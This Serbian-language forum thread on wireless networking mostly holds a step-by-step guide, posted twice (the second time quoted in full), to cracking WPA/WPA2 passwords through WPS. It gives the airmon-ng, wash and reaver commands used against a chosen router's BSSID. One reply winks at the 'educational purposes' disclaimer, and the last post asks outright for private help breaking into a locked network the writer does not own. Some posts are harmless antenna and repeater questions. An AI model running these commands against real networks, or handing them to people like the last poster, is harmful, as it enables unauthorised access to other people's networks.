Wireless - pitanja i odgovori

Član
Učlanjen(a)
13.03.2013
Poruka
18
Drug je izvrsio testiranje na svom ruteru i hakovanje WPA2 zastite. Sad cu ga pozvati da vam prenese :D
Znam ja kako je radio, ali necu sebi da pripusujem to pa nek vam on objasni... Sakriva se ovde na forumu :p
 
Član
Učlanjen(a)
07.03.2013
Poruka
17
Lazendic jel bi mogao da napravis neki tutorial na srpskom za hakovanje wpa2-psk ? Svima nama koji se bas ne snalazimo sa engleskim bi skratio muke . Unapred hvala
 
Član
Učlanjen(a)
29.02.2012
Poruka
1
pozdrav ljudi na nagovor Lazendic365 vam pisem moja iskustva
sve sto radim radim preko backtrack5 evo vam link Downloads ,
malo objasnjenje za skidanje idete na Download i odaberete verziju,
moja preporuka BackTrack 5 R3 GNOME i ko sta ima dal 32/64 bitna verzija skinite kao ISO,
i posle narezete butabilan cd ja radim preko ImgBurn-a.

dalje ja sam radio pomocu Reavera, u BT5 R3 postoji,
a ukoliko neko ima stariju verziju BT(a mrzi ga skidati novu) mora ga instalirati sasvim jednostavno
kad pokrenete BT potrebna je internet konekcija otvorite terminal ukucate:

apt-get update

apt- get install reaver (gotovo) idemo u napad

ako vam je BT5 R3 ovo preskocite.

otvorite novi terminal ukucate:

airmon-ng

airmon-ng start wlan0 (sad bi trebalo da vam je ukljucen monitor mod mon0)

wash

wash -i mon0 (prikazuje vam listu dostupnih uredaja, kada vam prikaze zrtvu idete CTRL+C da prekinetem kopirate bssid)

novi terminal:

reaver

reaver -i mon0 -b (ukucate bssid) -vv

(onda ce se pojaviti pitanje Y/N idite Y)

posle nepunih 6 sata sam naso sifru, male napomene:
kod mene je bio monitor mod mon0 nemora znaciti da je i kod vas,
bssid - je u ovom slucaju mac adresa uredaja koji napadate.
testiranje sam radio na svom ruteru koji je imao zastitu WPA2 i veoma bitna stvar WPS je bio ukljucen, a sad je pitanje za neke kako ja znam da li mogu napasti - kada ste ukucali *wash -i mon0* prikazalo vam je i jednu kolonu WPS locked i ako je odgovarajuci ruter NO mozete napasti.

ovo i radi i za WPA i WPA2 i vazno WPS ukljucen, trebalo bi svaku sifru nac do 10 sati trazenja a mozda i vise...

ovo vam pisem iskljucivo u EDUKATIVNE SVRHE

pozdrav
 
Član
Učlanjen(a)
13.03.2013
Poruka
18
pozdrav ljudi na nagovor Lazendic365 vam pisem moja iskustva
sve sto radim radim preko backtrack5 evo vam link Downloads ,
malo objasnjenje za skidanje idete na Download i odaberete verziju,
moja preporuka BackTrack 5 R3 GNOME i ko sta ima dal 32/64 bitna verzija skinite kao ISO,
i posle narezete butabilan cd ja radim preko ImgBurn-a.

dalje ja sam radio pomocu Reavera, u BT5 R3 postoji,
a ukoliko neko ima stariju verziju BT(a mrzi ga skidati novu) mora ga instalirati sasvim jednostavno
kad pokrenete BT potrebna je internet konekcija otvorite terminal ukucate:

apt-get update

apt- get install reaver (gotovo) idemo u napad

ako vam je BT5 R3 ovo preskocite.

otvorite novi terminal ukucate:

airmon-ng

airmon-ng start wlan0 (sad bi trebalo da vam je ukljucen monitor mod mon0)

wash

wash -i mon0 (prikazuje vam listu dostupnih uredaja, kada vam prikaze zrtvu idete CTRL+C da prekinetem kopirate bssid)

novi terminal:

reaver

reaver -i mon0 -b (ukucate bssid) -vv

(onda ce se pojaviti pitanje Y/N idite Y)

posle nepunih 6 sata sam naso sifru, male napomene:
kod mene je bio monitor mod mon0 nemora znaciti da je i kod vas,
bssid - je u ovom slucaju mac adresa uredaja koji napadate.
testiranje sam radio na svom ruteru koji je imao zastitu WPA2 i veoma bitna stvar WPS je bio ukljucen, a sad je pitanje za neke kako ja znam da li mogu napasti - kada ste ukucali *wash -i mon0* prikazalo vam je i jednu kolonu WPS locked i ako je odgovarajuci ruter NO mozete napasti.

ovo i radi i za WPA i WPA2 i vazno WPS ukljucen, trebalo bi svaku sifru nac do 10 sati trazenja a mozda i vise...

ovo vam pisem iskljucivo u EDUKATIVNE SVRHE

pozdrav

Kolega naravno da je u edukativne svrhe.
Mi hakovanje vrsimo samo na sopstvenim ruterima ;)
Odlicno objasnjenje...
 
Član
Učlanjen(a)
24.03.2013
Poruka
2
pozdrav!
imam laptop,windows vistu,antenu preko usb TP-LINK,model TL-WN822N,spojen sam na neidentificiranu mrežu uz ograničenu mogućnost povezivanja.jačina signala je od 15 do 30%.ako se može tu šta učiniti bio bih zahvalan
 
Član
Učlanjen(a)
16.03.2010
Poruka
542
pozdrav!
imam laptop,windows vistu,antenu preko usb TP-LINK,model TL-WN822N,spojen sam na neidentificiranu mrežu uz ograničenu mogućnost povezivanja.jačina signala je od 15 do 30%.ako se može tu šta učiniti bio bih zahvalan

druze sa tim tp linkom nista ne mozes da imas na primer TL-WN722NC ili TL-WN422G ili bilo koji drugi model sa skidajucim antenama mogao bi bilo koju externu antenu da prokacis i sve bi bilo ok ovako ne vidim sta bi ti pomoglo sa time osim setanja po sobi za bolji signal :)
 
Član
Učlanjen(a)
24.03.2013
Poruka
2
druze sa tim tp linkom nista ne mozes da imas na primer TL-WN722NC ili TL-WN422G ili bilo koji drugi model sa skidajucim antenama mogao bi bilo koju externu antenu da prokacis i sve bi bilo ok ovako ne vidim sta bi ti pomoglo sa time osim setanja po sobi za bolji signal :)


hvala,znači uz bolju antenu bih se mogao prikačiti iako piše ograničena mogućnost povezivanja,i koliko treba biti jak signal u % ?
 
Član
Učlanjen(a)
16.03.2010
Poruka
542
Vec sam napisala da sam probala i repeater mod, al da nisam uspela da podesim.
Marku i tip rutera sam takodje vec navela.
veoma rado bih pomogao ali taj ruter ne poznajem a repiter mod je puno zeznut za podesavanje,drugo da bi to radilo na tom ruteru moras da imas tako nesto i na ruteru sa kog uzimas signal i onda se u njega ubacuje mac adresa bla bla bla 300 cuda.drugim recima nimalo jednostavno.moj savet ti je da se zakacis obicno za taj sa ovim i da koristis net preko lana a ako hoces wfi kupi neki tplink i povezi ga u ruter mode sa tvojim i eto,inace nijh imas na netu od 1500 do 2000 din.pozz
 
Poslednja izmena:
Član
Učlanjen(a)
31.01.2013
Poruka
4
a kako najlakse da provalim pass od wirelessa wpa wpa2 zastita. ako mozete na private da mi detaljno napisete. posto bih da uvatim wireless na jedno mjesto dje cesto provodim vrijeme a sve je zakljucano. fala. ako neko moze da mi detaljno napise na private. zahvaljujem...
 
Natrag
Top